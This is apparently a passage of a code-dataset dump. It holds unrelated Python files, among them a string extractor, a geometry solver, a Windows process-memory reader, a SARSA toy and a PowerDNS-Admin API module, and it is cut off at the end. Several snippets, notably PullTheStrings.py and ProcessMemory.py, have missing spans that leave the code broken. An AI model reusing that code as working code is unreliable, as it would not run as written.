re.DOTALL)\ninPhp = re.compile(pattern3, re.DOTALL)\nphpNoEnd = re.compile(pattern4, re.DOTALL)\noutputDelimiter = ','\nStringArray = [['filename', 'line#', 'index/pos', 'type', 'string', 'length', 'line']] # format: filename, line#, quotIndex, quotType, string, length of string, line\n\ndef quotType(st):\n if st == '\"':\n return \"DQ\"\n elif st == \"'\":\n return \"SQ\"\n elif st == '`':\n return \"BQ\"\n elif st == '>':\n return \"HTML\"\n else:\n return \"Unknown\"\n\n\ndef CheckContent(fname, st, pos=0):\n #print st\n if len(st) < 1:\n return True\n global inTags, StringArray\n res = True\n nFound = 0\n for cont in inTags.finditer(st):\n nFound += 1\n if not (CheckContent(fname, cont.group(\"innerHTML\"), cont.start(\"innerHTML\")+pos)):\n StringArray += [[fname,'pos',cont.start(\"innerHTML\")+pos, quotType('>'), cont.group(\"innerHTML\")]]\n if nFound == 0:\n res = False\n return res\n\ndef CheckTheFile(fname):\n global inPhp, StringArray\n f = open(fname)\n Content = f.read()\n f.close()\n c = Content.replace(\"'), Comtent]]\n\n\ndef pullTheStrings(filename):\n global StringArray, inString\n # extract all between quotes and put into an array\n f = open(filename,'r')\n lines = f.readlines()\n f.close()\n lineCount = 0\n for line in lines:\n lineCount+=1\n quotIndex = 0\n for mo in inString.finditer(line):\n #print (mo.group(\"quote\"))\n if len(mo.group(\"words\")) > 0:\n StringArray += [[filename, lineCount, quotIndex, quotType(mo.group(\"quote\")), mo.group(\"words\"), len(mo.group(\"words\")), line.replace('\\r', '').replace('\\n','') ]]\n quotIndex += 1\n #alllines = '\\n'.join(lines)\n\n #print (filename + ', ' + repr(lineCount))\n\n\ndef saveTheWorld():\n # save the array as a .csv file\n global outputFile, StringArray\n SaveString = ''\n for line in StringArray:\n if len(line[4]) > 1 and line[0].find(line[4]) == -1 :\n SaveString += '\"' + line[0] + '\"' + outputDelimiter + '' + repr(line[1]) + '' + outputDelimiter + '' + repr(line[2]) + '' + outputDelimiter + '' + line[3] + '' + outputDelimiter + '\"' + line[4].replace('\"', '\"\"') + '\"' + outputDelimiter + '' + repr(line[5]) + '' + outputDelimiter + '\"' + line[6].replace('\"', '\"\"') +'\"\\n'\n f = open(outputFile, 'w')\n f.write(SaveString)\n f.close()\n #print \"Saved to [\" + outputFile + ']'\n #print repr(StringArray)\n\nfor root, dirs, files in os.walk(rootDir):\n for fname in files:\n if os.path.splitext(fname)[1] in ['.php', '.js', '.css', '.sql']:\n pullTheStrings(os.path.join(root,fname))\n if os.path.splitext(fname)[1] in ['.php']:\n CheckTheFile(os.path.join(root,fname))\nsaveTheWorld()\n\n#print (pattern1)\n","sub_path":"PullTheStrings.py","file_name":"PullTheStrings.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"211002672","text":"from math import sqrt\n\ndef cross(p0, p1, p2):\n x0, y0 = p0\n x1, y1 = p1\n x2, y2 = p2\n x1 -=x0\n x2 -=x0\n y1 -=y0\n y2 -=y0\n print('x1 is ',x1,'x2 is',x2)\n return x1*y2 - x2*y1\n\ndef dot(p0, p1, p2):\n x0, y0 = p0\n x1, y1 = p1\n x2, y2 = p2\n x1 -=x0\n x2 -=x0\n y1 -=y0\n y2 -=y0\n return x1*x2 + y1*y2\n\ndef dist2(p0, p1):\n x0, y0 = p0\n x1, y1 = p1\n return (x1-x0)**2 + (y1 - y0)**2\n\ndef collision_ll(s0, s1,t0,t1):\n return cross(s0, s1,t0)*cross(s0,s1,t1)<0 and cross(t0, t1,s0) * cross(t0,t1,s1) < 0\n\ndef dist_lp(S,E,P):\n dd = dist2(S,E)\n if 0 <= dot(S,E,P) <= dd:\n return abs(cross(S,E,P))/sqrt(dd)\n return sqrt(min(dist2(S,P), dist2(E,P)))\n\ndef dist_ll(s0, s1, t0, t1):\n if collision_ll(s0,s1,t0,t1):\n return 0\n return min(\n dist_lp(s0, s1, t0),\n dist_lp(s0, s1, t1),\n dist_lp(t0, t1, s0),\n dist_lp(t0, t1, s1)\n )\n\nn = int(input())\nfor i in range(n):\n x0,y0,x1,y1,X0,Y0,X1,Y1 = map(int,input().split())\n print(\"%.010f\"%dist_ll((x0,y0), (x1,y1), (X0,Y0),(X1,Y1)))\n","sub_path":"advanced/distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"537004531","text":"import pygame\npygame.init()\n\nwhite = (255,255,255)\nblack = (0,0,0)\nred = (255,0,0)\n\ngameDisplay = pygame.display.set_mode((1280,720))\npygame.display.set_caption(\"Oli Snake\")\n\ngameExit = False\n\nlead_x = 600\nlead_y = 300\nlead_x_change = 0\n\nwhile not gameExit:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n gameExit = True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n lead_x_change = -10\n if event.key == pygame.K_RIGHT:\n lead_x_change = 10\n\n lead_x += lead_x_change\n\n gameDisplay.fill(white)\n\n gameDisplay.fill(black, rect=[lead_x,lead_y,100,100])\n \n pygame.display.update()\n\npygame.quit()\nquit()\n\n","sub_path":"Oli_Snake/Oli Snake.py","file_name":"Oli Snake.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"636017157","text":"# -*- coding: utf-8 -*-\nfrom openprocurement.api.utils import (\n json_view,\n)\nfrom openprocurement.api.validation import (\n validate_file_update,\n validate_patch_document_data,\n validate_file_upload,\n)\nfrom openprocurement.tender.core.views.document import CoreDocumentResource\nfrom openprocurement.tender.openeu.utils import qualifications_resource\nfrom openprocurement.tender.openeu.validation import (\n validate_qualification_document_operation_not_in_pending,\n validate_qualification_document_operation_not_in_allowed_status,\n validate_qualification_update_with_cancellation_lot_pending,\n)\n\n\n@qualifications_resource(\n name=\"aboveThresholdEU:Tender Qualification Documents\",\n collection_path=\"/tenders/{tender_id}/qualifications/{qualification_id}/documents\",\n path=\"/tenders/{tender_id}/qualifications/{qualification_id}/documents/{document_id}\",\n procurementMethodType=\"aboveThresholdEU\",\n description=\"Tender qualification documents\",\n)\nclass TenderQualificationDocumentResource(CoreDocumentResource):\n container = \"documents\"\n context_name = \"tender_qualification\"\n\n def set_doc_author(self, doc):\n doc.author = self.request.authenticated_role\n return doc\n\n @json_view(\n permission=\"upload_qualification_documents\",\n validators=(\n validate_file_upload,\n validate_qualification_update_with_cancellation_lot_pending,\n validate_qualification_document_operation_not_in_allowed_status,\n validate_qualification_document_operation_not_in_pending,\n ),\n )\n def collection_post(self):\n \"\"\"Tender Qualification Document Upload\n \"\"\"\n return super(TenderQualificationDocumentResource, self).collection_post()\n\n @json_view(\n validators=(\n validate_file_update,\n validate_qualification_update_with_cancellation_lot_pending,\n validate_qualification_document_operation_not_in_allowed_status,\n validate_qualification_document_operation_not_in_pending,\n ),\n permission=\"upload_qualification_documents\",\n )\n def put(self):\n \"\"\"Tender Qualification Document Update\"\"\"\n return super(TenderQualificationDocumentResource, self).put()\n\n @json_view(\n content_type=\"application/json\",\n validators=(\n validate_patch_document_data,\n validate_qualification_update_with_cancellation_lot_pending,\n validate_qualification_document_operation_not_in_allowed_status,\n validate_qualification_document_operation_not_in_pending,\n ),\n permission=\"upload_qualification_documents\",\n )\n def patch(self):\n \"\"\"Tender Qualification Document Update\"\"\"\n return super(TenderQualificationDocumentResource, self).patch()\n","sub_path":"src/openprocurement/tender/openeu/views/qualification_document.py","file_name":"qualification_document.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"604395853","text":"#! /usr/bin/python2.7\nimport datetime\nimport os\n\nimport pymongo\nimport shapefile\n\n# Local configuration variable indicating where the split country shapefiles\n# are located.\nBASE_PATH = os.path.join(os.path.dirname(__file__), os.pardir, 'data',\n 'CShapes_date')\n\n# Connect to the database\nclient = pymongo.MongoClient(os.environ['INTERNATIONAL_RIVERS_MONGO_URI'])\ndb = client.internationalrivers\n\n# Retrieve the collection for country layer information\ncountry_layer_collection = db.countrylayer\n\n# Iterate over all the available country shapefiles and retrieve their\n# validity dates following the format of CShapes__.shp\n# where start_date and end_date are formatted as %d_%m_%y.\nfor filename in os.listdir(BASE_PATH):\n if filename.endswith('.shp'):\n # Parse the filename\n tokens = filename[:-4].split('_')\n start_date = datetime.datetime.strptime(\n '.'.join(tokens[1:4]), '%d.%m.%y')\n end_date = datetime.datetime.strptime(\n '.'.join(tokens[4:7]), '%d.%m.%y')\n\n # Handle the years before 2000, datetime sets all to the current\n # century.\n if start_date.year > 2010:\n start_date = start_date.replace(year=start_date.year - 100)\n if end_date.year > 2010:\n end_date = end_date.replace(year=end_date.year - 100)\n\n # Build the record and store it.\n record = {\n 'startDate': start_date,\n 'endDate': end_date,\n 'layer': filename[:-4]\n }\n country_layer_collection.insert(record)\n\n# Iterate over all the country shape polygons and retrieve all the feature\n# data associated with it in the shape file. Parse the types appropriately\n# to python types and store it in the database in a separate collection.\ncountry_shapes = shapefile.Reader('data/CShapes.shp')\n\n# Retrieve the collection for country data\nc_collection = db.country\n\nfields = country_shapes.fields\n\nfor shape_record in country_shapes.shapeRecords():\n shape = shape_record.shape\n record = shape_record.record\n document = {}\n start_date = [None, None, None]\n end_date = [None, None, None]\n for field_data, record_item in zip(fields[1:], record):\n field_name = field_data[0]\n field_type = field_data[1]\n field_float = field_data[3]\n if field_type == 'C' or field_name == 'FEATUREID':\n document[field_name] = str(record_item)\n elif field_type == 'N':\n if field_float != 0 and not field_name.startswith('GW'):\n document[field_name] = float(record_item)\n else:\n document[field_name] = int(record_item)\n if field_name == 'COWSYEAR':\n start_date[0] = int(record_item)\n elif field_name == 'COWSMONTH':\n start_date[1] = int(record_item)\n elif field_name == 'COWSDAY':\n start_date[2] = int(record_item)\n elif field_name == 'COWEYEAR':\n end_date[0] = int(record_item)\n elif field_name == 'COWEMONTH':\n end_date[1] = int(record_item)\n elif field_name == 'COWEDAY':\n end_date[2] = int(record_item)\n document['COWS'] = datetime.datetime(*start_date)\n document['COWE'] = datetime.datetime(*end_date)\n c_collection.insert(document)\n\n# Iterate over all the basin shape polygons and retrieve all the feature data\n# associated with it in the shape file. Store the polygon as a GeoJSON in the\n# database.\nbasin_shapes = shapefile.Reader('data/WorldBasins.shp')\n\n# Retrieve the collection for basin data\nb_collection = db.basin\n\nfields = basin_shapes.fields\n\nfor shape_record in basin_shapes.shapeRecords():\n shape = shape_record.shape\n record = shape_record.record\n document = {}\n for field_data, record_item in zip(fields[1:], record):\n field_name = field_data[0]\n field_type = field_data[1]\n field_float = field_data[3]\n if field_type == 'C' or field_name == 'Basin_ID':\n document[field_name] = str(record_item)\n elif field_type == 'N':\n if field_float != 0:\n document[field_name] = float(record_item)\n else:\n document[field_name] = int(record_item)\n #document['shape'] = shape.__geo_interface__\n b_collection.insert(document)\n\n# Iterate over all the basin-country intersection polygons and retrieve all\n# the feature data associated with them. Store the data in the appropriate\n# collection in the database.\ncountry_basin_intersections = shapefile.Reader('data/CNTRY_BAS.shp')\n\n# Retrieve the collection for country-basin intersections data\ncbi_collection = db.countrybasinintersection\n\nfields = country_basin_intersections.fields\n\nfor shape_record in country_basin_intersections.shapeRecords():\n shape = shape_record.shape\n record = shape_record.record\n document = {}\n for field_data, record_item in zip(fields[1:], record):\n field_name = field_data[0]\n field_type = field_data[1]\n field_float = field_data[3]\n if field_type == 'C' or field_name == 'Basin_ID' or\\\n field_name == 'FEATUREID' or field_name == 'BC_ID':\n document[field_name] = str(record_item)\n elif field_type == 'N':\n if field_float != 0:\n document[field_name] = float(record_item)\n else:\n document[field_name] = int(record_item)\n cbi_collection.insert(document)\n","sub_path":"scripts/store_data_in_mongodb.py","file_name":"store_data_in_mongodb.py","file_ext":"py","file_size_in_byte":5460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"120577460","text":"from ctypes import *\nfrom ctypes.wintypes import *\nimport psutil, platform, win32api, win32process, struct, sys\n\nclass ProcessMemory():\n def __init__(self):\n self.WinAPI = self.WinAPI()\n\n self.processPid = -1\n self.processHandler = None\n self.modules = []\n self.IsHooked = False\n\n def getpid(self, nameprocess: str):\n for process in psutil.process_iter():\n try:\n if nameprocess in process.name():\n return process.pid\n except (PermissionError, psutil.AccessDenied):\n continue\n return -1\n\n def HookProcess(self, name: str):\n self.IsHooked = self.processHandler != None and psutil.pid_exists(self.processPid)\n if not self.IsHooked:\n self.processPid = self.getpid(name)\n if self.processPid != -1:\n self.processHandler = win32api.OpenProcess(0x410, 0, self.processPid)\n if self.processHandler != None and psutil.pid_exists(self.processPid):\n moduleIds = win32process.EnumProcessModulesEx(self.processHandler, 0x3)\n if len(moduleIds) > 0:\n for moduleId in moduleIds:\n moduleName = self.WinAPI.GetModuleBaseName(self.processHandler, c_void_p(moduleId))\n moduleInfo = self.WinAPI.GetModuleInformation(self.processHandler, c_void_p(moduleId))\n m = self.Module()\n m.BaseAddress = moduleInfo.BaseAddress\n m.Name = moduleName\n self.modules.append(m)\n self.IsHooked = True\n return self.IsHooked\n\n def ReadPointer(self, address: int, offsets: list, numBytes: int):\n if self.processHandler == None or address == 0:\n return 0\n \n for ofs in offsets[:-1]:\n buffer = self.Read(address + ofs, 4)\n address = struct.unpack(' 0 else 0\n b = self.Read(address + last, numBytes)\n return b\n\n def ReadString(self, address: int):\n if self.processHandler == None or address == 0:\n return 0\n\n stringLength = struct.unpack(' 2**32 else c_ulong()\n _ReadProcessMemory(processHandle.handle, address, byref(data), sizeof(data), byref(bytesRead))\n return data\n\n class Module(Structure):\n _fields_ = [\n (\"BaseAddress\", LPVOID), # remote pointer\n (\"Name\", LPWSTR),\n ]\n\n class ModuleInfo(Structure):\n _fields_ = [\n (\"BaseAddress\", c_void_p), # remote pointer\n (\"ModuleSize\", DWORD),\n (\"EntryPoint\", c_void_p), # remote pointer\n ]","sub_path":"ProcessMemory.py","file_name":"ProcessMemory.py","file_ext":"py","file_size_in_byte":4625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"526544999","text":"import numpy as np\nimport pandas as pd\nimport time\n\nnp.random.seed(2)\n\nN_STATE = 6\nFRESH_TIME = 0.1\nN_EPISODE = 10 # 回合\nACTIONS = ['left', 'right']\nEPI = 0.9 # probability for choosing actions\nLAMBDA = 0.9 # discount factor\nALPHA = 0.1 # learning rate\n\n\ndef update_env(State, episode, step_cnt):\n env_list = ['-']*(N_STATE-1) + ['T']\n if State == 'terminal':\n interaction = 'Episode %s: total_steps = %s' % (episode, step_cnt)\n print('\\r{0}'.format(interaction), end='')\n time.sleep(2)\n print('\\r ', end='')\n else:\n env_list[State] = 'o'\n interaction = ''.join(env_list)\n print('\\r{0}'.format(interaction), end='')\n time.sleep(FRESH_TIME)\n\n\ndef build_q_table(actions):\n table = pd.DataFrame(np.zeros((N_STATE-1, len(actions))), columns=actions)\n return table\n\n\ndef choose_action(epi, table, state):\n table_row = table.loc[state, :]\n if np.random.rand() < epi and table_row.any() is True:\n action_res = table_row.idxmax()\n else:\n action_res = np.random.choice(ACTIONS)\n return action_res\n\n\ndef env_forward(action, state):\n if action == 'left':\n reward = 0\n if state != 0:\n next_state = state - 1\n else:\n next_state = state\n else:\n if state != N_STATE-2:\n next_state = state + 1\n reward = 0\n else:\n next_state = 'terminal'\n reward = 1\n return next_state, reward\n\n\ndef main_loop():\n q_table = build_q_table(ACTIONS)\n for episode in range(N_EPISODE):\n is_terminal = False\n state = 0\n step_counter = 0\n # choose the action of the first step\n action = choose_action(EPI, q_table, state)\n while not is_terminal: # each step\n # forward\n next_state, reward = env_forward(action, state)\n step_counter += 1\n # whether terminal\n if next_state == 'terminal':\n is_terminal = True\n # update q table\n q_now = q_table.loc[state, action]\n if is_terminal:\n q_target = reward\n else:\n # choose the next action\n next_action = choose_action(EPI, q_table, next_state)\n q_target = reward + LAMBDA*q_table.loc[next_state, next_action]\n q_table.loc[state, action] += ALPHA*(q_target-q_now)\n # update state and env\n action = next_action\n state = next_state\n update_env(state, episode, step_counter)\n # show q table of each episode\n print('\\r{0}'.format(q_table))\n time.sleep(1)\n\n\nif __name__ == '__main__':\n main_loop()\n","sub_path":"sarsa.py","file_name":"sarsa.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"511455702","text":"###############################################################################\n# This file is part of the ValSimP package.\n# See the packages LICENSE file for copyright and licensing conditions.\n###############################################################################\nimport gzip\n\n__all__ = [\"zopen\", ]\n\n\n\n\ndef zopen(fname, mode):\n \"\"\"Opens a file with gzip if it ends on '.gz', otherwise normal.\n\n Args:\n fname: Name of the file to open.\n mode: File operation mode string.\n\n Returns:\n File like object.\n \"\"\"\n if fname.endswith(\".gz\"):\n return gzip.open(fname, mode)\n else:\n return open(fname, mode)\n","sub_path":"src/valsimp/io/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"89432561","text":"import json\nfrom flask import Blueprint, g, request, abort\nfrom app.models import Domain, History, Setting, ApiKey\nfrom app.lib import utils, helper\nfrom app.decorators import api_basic_auth, api_can_create_domain, is_json\nfrom app.decorators import apikey_auth, apikey_is_admin\nfrom app.decorators import apikey_can_access_domain\nfrom app import csrf\nfrom app.errors import DomainNotExists, DomainAccessForbidden, RequestIsNotJSON\nfrom app.errors import ApiKeyCreateFail, ApiKeyNotUsable, NotEnoughPrivileges\nfrom app.schema import ApiKeySchema, DomainSchema, ApiPlainKeySchema\nfrom urllib.parse import urljoin\nfrom app.lib.log import logging\n\napi_blueprint = Blueprint('api_blueprint', __name__)\n\napikey_schema = ApiKeySchema(many=True)\ndomain_schema = DomainSchema(many=True)\napikey_plain_schema = ApiPlainKeySchema(many=True)\n\n\n@api_blueprint.errorhandler(400)\ndef handle_400(err):\n return json.dumps({\"msg\": \"Bad Request\"}), 400\n\n\n@api_blueprint.errorhandler(401)\ndef handle_401(err):\n return json.dumps({\"msg\": \"Unauthorized\"}), 401\n\n\n@api_blueprint.errorhandler(500)\ndef handle_500(err):\n return json.dumps({\"msg\": \"Internal Server Error\"}), 500\n\n\n@api_blueprint.errorhandler(DomainNotExists)\ndef handle_domain_not_exists(err):\n return json.dumps(err.to_dict()), err.status_code\n\n\n@api_blueprint.errorhandler(DomainAccessForbidden)\ndef handle_domain_access_forbidden(err):\n return json.dumps(err.to_dict()), err.status_code\n\n\n@api_blueprint.errorhandler(ApiKeyCreateFail)\ndef handle_apikey_create_fail(err):\n return json.dumps(err.to_dict()), err.status_code\n\n\n@api_blueprint.errorhandler(ApiKeyNotUsable)\ndef handle_apikey_not_usable(err):\n return json.dumps(err.to_dict()), err.status_code\n\n\n@api_blueprint.errorhandler(NotEnoughPrivileges)\ndef handle_not_enough_privileges(err):\n return json.dumps(err.to_dict()), err.status_code\n\n\n@api_blueprint.errorhandler(RequestIsNotJSON)\ndef handle_request_is_not_json(err):\n return json.dumps(err.to_dict()), err.status_code\n\n\n@api_blueprint.before_request\n@is_json\ndef before_request():\n pass\n\n\n@csrf.exempt\n@api_blueprint.route('/pdnsadmin/zones', methods=['POST'])\n@api_basic_auth\n@api_can_create_domain\ndef api_login_create_zone():\n pdns_api_url = Setting().get('pdns_api_url')\n pdns_api_key = Setting().get('pdns_api_key')\n pdns_version = Setting().get('pdns_version')\n api_uri_with_prefix = utils.pdns_api_extended_uri(pdns_version)\n api_full_uri = api_uri_with_prefix + '/servers/localhost/zones'\n headers = {}\n headers['X-API-Key'] = pdns_api_key\n\n msg_str = \"Sending request to powerdns API {0}\"\n msg = msg_str.format(request.get_json(force=True))\n logging.debug(msg)\n\n resp = utils.fetch_remote(\n urljoin(pdns_api_url, api_full_uri),\n method='POST',\n data=request.get_json(force=True),\n headers=headers,\n accept='application/json; q=1'\n )\n\n if resp.status_code == 201:\n logging.debug(\"Request to powerdns API successful\")\n data = request.get_json(force=True)\n\n history = History(\n msg='Add domain {0}'.format(data['name'].rstrip('.')),\n detail=json.dumps(data),\n created_by=g.user.username\n )\n history.add()\n\n if g.user.role.name not in ['Administrator', 'Operator']:\n logging.debug(\"User is ordinary user, assigning created domain\")\n domain = Domain(name=data['name'].rstrip('.'))\n domain.update()\n domain.grant_privileges([g.user.username])\n\n domain = Domain()\n domain.update()\n\n return resp.content, resp.status_code, resp.headers.items()\n\n\n@csrf.exempt\n@api_blueprint.route('/pdnsadmin/zones', methods=['GET'])\n@api_basic_auth\ndef api_login_list_zones():\n if g.user.role.name not in ['Administrator', 'Operator']:\n domain_obj_list = g.user.get_domains()\n else:\n domain_obj_list = Domain.query.all()\n\n domain_obj_list = [] if domain_obj_list is None else domain_obj_list\n return json.dumps(domain_schema.dump(domain_obj_list)), 200\n\n\n@csrf.exempt\n@api_blueprint.route(\n '/pdnsadmin/zones/',\n methods=['DELETE']\n)\n@api_basic_auth\n@api_can_create_domain\ndef api_login_delete_zone(domain_name):\n pdns_api_url = Setting().get('pdns_api_url')\n pdns_api_key = Setting().get('pdns_api_key')\n pdns_version = Setting().get('pdns_version')\n api_uri_with_prefix = utils.pdns_api_extended_uri(pdns_version)\n api_full_uri = api_uri_with_prefix + '/servers/localhost/zones'\n api_full_uri += '/' + domain_name\n headers = {}\n headers['X-API-Key'] = pdns_api_key\n\n domain = Domain.query.filter(Domain.name == domain_name)\n\n if not domain:\n abort(404)\n\n if g.user.role.name not in ['Administrator', 'Operator']:\n user_domains_obj_list = g.user.get_domains()\n user_domains_list = [item.name for item in user_domains_obj_list]\n\n if domain_name not in user_domains_list:\n raise DomainAccessForbidden()\n\n msg_str = \"Sending request to powerdns API {0}\"\n logging.debug(msg_str.format(domain_name))\n\n try:\n resp = utils.fetch_remote(\n urljoin(pdns_api_url, api_full_uri),\n method='DELETE',\n headers=headers,\n accept='application/json; q=1'\n )\n\n if resp.status_code == 204:\n logging.debug(\"Request to powerdns API successful\")\n\n history = History(\n msg='Delete domain {0}'.format(domain_name),\n detail='',\n created_by=g.user.username\n )\n history.add()\n\n domain = Domain()\n domain.update()\n except Exception as e:\n logging.error('Error: {0}'.format(e))\n abort(500)\n\n return resp.content, resp.status_code, resp.headers.items()\n\n\n@csrf.exempt\n@api_blueprint.route('/pdnsadmin/apikeys', methods=['POST'])\n@api_basic_auth\ndef api_generate_apikey():\n data = request.get_json()\n description = None\n role_name = None\n apikey = None\n domain_obj_list = []\n\n abort(400) if 'domains' not in data else None\n abort(400) if not isinstance(data['domains'], (list,)) else None\n abort(400) if 'role' not in data else None\n\n description = data['description'] if 'description' in data else None\n role_name = data['role']\n domains = data['domains']\n\n if role_name == 'User' and len(domains) == 0:\n logging.error(\"Apikey with User role must have domains\")\n raise ApiKeyNotUsable()\n elif role_name == 'User':\n domain_obj_list = Domain.query.filter(Domain.name.in_(domains)).all()\n if len(domain_obj_list) == 0:\n msg = \"One of supplied domains does not exists\"\n logging.error(msg)\n raise DomainNotExists(message=msg)\n\n if g.user.role.name not in ['Administrator', 'Operator']:\n # domain list of domain api key should be valid for\n # if not any domain error\n # role of api key, user cannot assign role above for api key\n if role_name != 'User':\n msg = \"User cannot assign other role than User\"\n logging.error(msg)\n raise NotEnoughPrivileges(message=msg)\n\n user_domain_obj_list = g.user.get_domains()\n\n domain_list = [item.name for item in domain_obj_list]\n user_domain_list = [item.name for item in user_domain_obj_list]\n\n logging.debug(\"Input domain list: {0}\".format(domain_list))\n logging.debug(\"User domain list: {0}\".format(user_domain_list))\n\n inter = set(domain_list).intersection(set(user_domain_list))\n\n if not (len(inter) == len(domain_list)):\n msg = \"You don't have access to one of domains\"\n logging.error(msg)\n raise DomainAccessForbidden(message=msg)\n\n apikey = ApiKey(\n desc=description,\n role_name=role_name,\n domains=domain_obj_list\n )\n\n try:\n apikey.create()\n except Exception as e:\n logging.error('Error: {0}'.format(e))\n raise ApiKeyCreateFail(message='Api key create failed')\n\n return json.dumps(apikey_plain_schema.dump([apikey])), 201\n\n\n@csrf.exempt\n@api_blueprint.route('/pdnsadmin/apikeys', defaults={'domain_name': None})\n@api_blueprint.route('/pdnsadmin/apikeys/')\n@api_basic_auth\ndef api_get_apikeys(domain_name):\n apikeys = []\n logging.debug(\"Getting apikeys\")\n\n if g.user.role.name not in ['Administrator', 'Operator']:\n if domain_name:\n msg = \"Check if domain {0} exists and \\\n is allowed for user.\" . format(domain_name)\n logging.debug(msg)\n apikeys = g.user.get_apikeys(domain_name)\n\n if not apikeys:\n raise DomainAccessForbidden(name=domain_name)\n\n logging.debug(apikey_schema.dump(apikeys))\n else:\n msg_str = \"Getting all allowed domains for user {0}\"\n msg = msg_str . format(g.user.username)\n logging.debug(msg)\n\n try:\n apikeys = g.user.get_apikeys()\n logging.debug(apikey_schema.dump(apikeys))\n except Exception as e:\n logging.error('Error: {0}'.format(e))\n abort(500)\n else:\n logging.debug(\"Getting all domains for administrative user\")\n try:\n apikeys = ApiKey.query.all()\n logging.debug(apikey_schema.dump(apikeys))\n except Exception as e:\n logging.error('Error: {0}'.format(e))\n abort(500)\n\n return json.dumps(apikey_schema.dump(apikeys)), 200\n\n\n@csrf.exempt\n@api_blueprint.route('/pdnsadmin/apikeys/', methods=['DELETE'])\n@api_basic_auth\ndef api_delete_apikey(apikey_id):\n apikey = ApiKey.query.get(apikey_id)\n\n if not apikey:\n abort(404)\n\n logging.debug(g.user.role.name)\n\n if g.user.role.name not in ['Administrator', 'Operator']:\n apikeys = g.user.get_apikeys()\n user_domains_obj_list = g.user.get_domain().all()\n apikey_domains_obj_list = apikey.domains\n user_domains_list = [item.name for item in user_domains_obj_list]\n apikey_domains_list = [item.name for item in apikey_domains_obj_list]\n apikeys_ids = [apikey_item.id for apikey_item in apikeys]\n\n inter = set(apikey_domains_list).intersection(set(user_domains_list))\n\n if not (len(inter) == len(apikey_domains_list)):\n msg = \"You don't have access to some domains apikey belongs to\"\n logging.error(msg)\n raise DomainAccessForbidden(message=msg)\n\n if apikey_id not in apikeys_ids:\n raise DomainAccessForbidden()\n\n try:\n apikey.delete()\n except Exception as e:\n logging.error('Error: {0}'.format(e))\n abort(500)\n\n return '', 204\n\n\n@csrf.exempt\n@api_blueprint.route('/pdnsadmin/apikeys/', methods=['PUT'])\n@api_basic_auth\ndef api_update_apikey(apikey_id):\n # if role different and user is allowed to change it, update\n # if apikey domains are different and user is allowed to handle\n # that domains update domains\n data = request.get_json()\n description = data['description'] if 'description' in data else None\n role_name = data['role'] if 'role' in data else None\n domains = data['domains'] if 'domains' in data else None\n domain_obj_list = None\n\n apikey = ApiKey.query.get(apikey_id)\n\n if not apikey:\n abort(404)\n\n logging.debug('Updating apikey with id {0}'.format(apikey_id))\n\n if role_name == 'User' and len(domains) == 0:\n logging.error(\"Apikey with User role must have domains\")\n raise ApiKeyNotUsable()\n elif role_name == 'User':\n domain_obj_list = Domain.query.filter(Domain.name.in_(domains)).all()\n if len(domain_obj_list) == 0:\n msg = \"One of supplied domains does not exists\"\n logging.error(msg)\n raise DomainNotExists(message=msg)\n\n if g.user.role.name not in ['Administrator', 'Operator']:\n if role_name != 'User':\n msg = \"User cannot assign other role than User\"\n logging.error(msg)\n raise NotEnoughPrivileges(message=msg)\n\n apikeys = g.user.get_apikeys()\n apikey_domains = [item.name for item in apikey.domains]\n apikeys_ids = [apikey_item.id for apikey_item in apikeys]\n\n user_domain_obj_list = g.user.get_domain().all()\n\n domain_list = [item.name for item in domain_obj_list]\n user_domain_list = [item.name for item in user_domain_obj_list]\n\n logging.debug(\"Input domain list: {0}\".format(domain_list))\n logging.debug(\"User domain list: {0}\".format(user_domain_list))\n\n inter = set(domain_list).intersection(set(user_domain_list))\n\n if not (len(inter) == len(domain_list)):\n msg = \"You don't have access to one of domains\"\n logging.error(msg)\n raise DomainAccessForbidden(message=msg)\n\n if apikey_id not in apikeys_ids:\n msg = 'Apikey does not belong to domain to which user has access'\n logging.error(msg)\n raise DomainAccessForbidden()\n\n if set(domains) == set(apikey_domains):\n logging.debug(\"Domains are same, apikey domains won't be updated\")\n domains = None\n\n if role_name == apikey.role:\n logging.debug(\"Role is same, apikey role won't be updated\")\n role_name = None\n\n if description == apikey.description:\n msg = \"Description is same, apikey description won't be updated\"\n logging.debug(msg)\n description = None\n\n try:\n apikey = ApiKey.query.get(apikey_id)\n apikey.update(\n role_name=role_name,\n domains=domains,\n description=description\n )\n except Exception as e:\n logging.error('Error: {0}'.format(e))\n abort(500)\n\n return '', 204\n\n\n@csrf.exempt\n@api_blueprint.route(\n '/servers//zones//',\n methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE']\n)\n@apikey_auth\n@apikey_can_access_domain\ndef api_zone_subpath_forward(server_id, zone_id, subpath):\n resp = helper.forward_request()\n return resp.content, resp.status_code, resp.headers.items()\n\n\n@csrf.exempt\n@api_blueprint.route(\n '/servers//zones/',\n methods=['GET', 'PUT', 'PATCH', 'DELETE']\n)\n@apikey_auth\n@apikey_can_access_domain\ndef api_zone_forward(server_id, zone_id):\n resp = helper.forward_request()\n domain = Domain()\n domain.update()\n return resp.content, resp.status_code, resp.headers.items()\n\n\n@api_blueprint.route(\n '/servers',\n methods=['GET']\n)\n@apikey_auth\n@apikey_is_admin\ndef api_server_forward():\n resp = helper.forward_request()\n return resp.content, resp.status_code, resp.headers.items()\n\n\n@api_blueprint.route(\n '/servers/',\n methods=['GET', 'PUT']\n)\n@apikey_auth\n@apikey_is_admin\ndef api_server_sub_forward(subpath):\n resp = 